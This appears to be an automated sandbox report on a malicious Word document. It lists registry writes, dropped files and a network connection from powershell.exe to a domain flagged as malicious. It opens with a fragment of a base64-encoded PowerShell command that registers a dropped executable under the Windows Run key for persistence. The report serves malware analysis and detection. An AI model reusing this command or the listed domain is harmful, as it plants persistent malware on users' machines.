AHAAUAB1AEIANQBDAG4AdwBDAFEAVAAgAD0AJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQArACcAXABPAFQAQwBrAGUAbwBtAEYALgBlAHgAZQAnADsATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AJwAgAC0ATgBhAG0AZQAgACcAMQAwADEAMAAxADAAMQAnACAALQBWAGEAbAB1AGUAIAAkAEQAVgBYAGUAZQBFADcAagBtAGkAcABUADcAWABQAFUATwBwAFAAdQBCADUAQwBuAHcAQwBRAFQAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAJwBTAHQAcgBpAG4AZwAnACAALQBGAG8AcgBjAGUAIAB8ACAATwB1AHQALQBOAHUAbABsADsADQAKAA0ACgB9AGMAYQB0AGMAaAB7AH0A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmD.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| (PID) Process: | (3204) MSOXMLED.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | WORDFiles |
Value: 1298661391 | |||
| (PID) Process: | (2504) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | 4&i |
Value: 34266900C8090000010000000000000000000000 | |||
| (PID) Process: | (2504) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (2504) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: On | |||
| (PID) Process: | (2504) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | WORDFiles |
Value: 1298661392 | |||
| (PID) Process: | (2504) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1298661504 | |||
| (PID) Process: | (2504) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1298661505 | |||
| (PID) Process: | (2504) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
| Operation: | write | Name: | MTTT |
Value: C80900002E92B5282D77D40100000000 | |||
| (PID) Process: | (2504) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | %)i |
Value: 25296900C809000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (2504) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | delete value | Name: | %)i |
Value: 25296900C809000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2504 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA2B4.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3780 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TM97V8G0LUODY3Y1MKIQ.temp | — | |
MD5:— | SHA256:— | |||
| 2504 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5AE2623B.jpg | — | |
MD5:— | SHA256:— | |||
| 2504 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoA68D.tmp | — | |
MD5:— | SHA256:— | |||
| 2504 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5933E3AC-49E1-4FBC-904F-56097A0ACAB9}.tmp | — | |
MD5:— | SHA256:— | |||
| 2504 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B8ECBBCE-8AF9-497A-A864-CF3961CCCAED}.tmp | — | |
MD5:— | SHA256:— | |||
| 2504 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{657C6539-4EB4-48EE-A6A3-AEB5131F655C}.tmp | — | |
MD5:— | SHA256:— | |||
| 2504 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\23fa88bbab4ec6ec9125733d367295ace6e828ca670a88e979fcddff1d63a77c.xml.LNK | lnk | |
MD5:— | SHA256:— | |||
| 2504 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:— | SHA256:— | |||
| 2504 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:— | SHA256:— | |||
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
3780 | powershell.exe | 163.172.215.76:443 | e.coka.la | Online S.a.s. | NL | malicious |
Domain | IP | Reputation |
|---|---|---|
e.coka.la |
| malicious |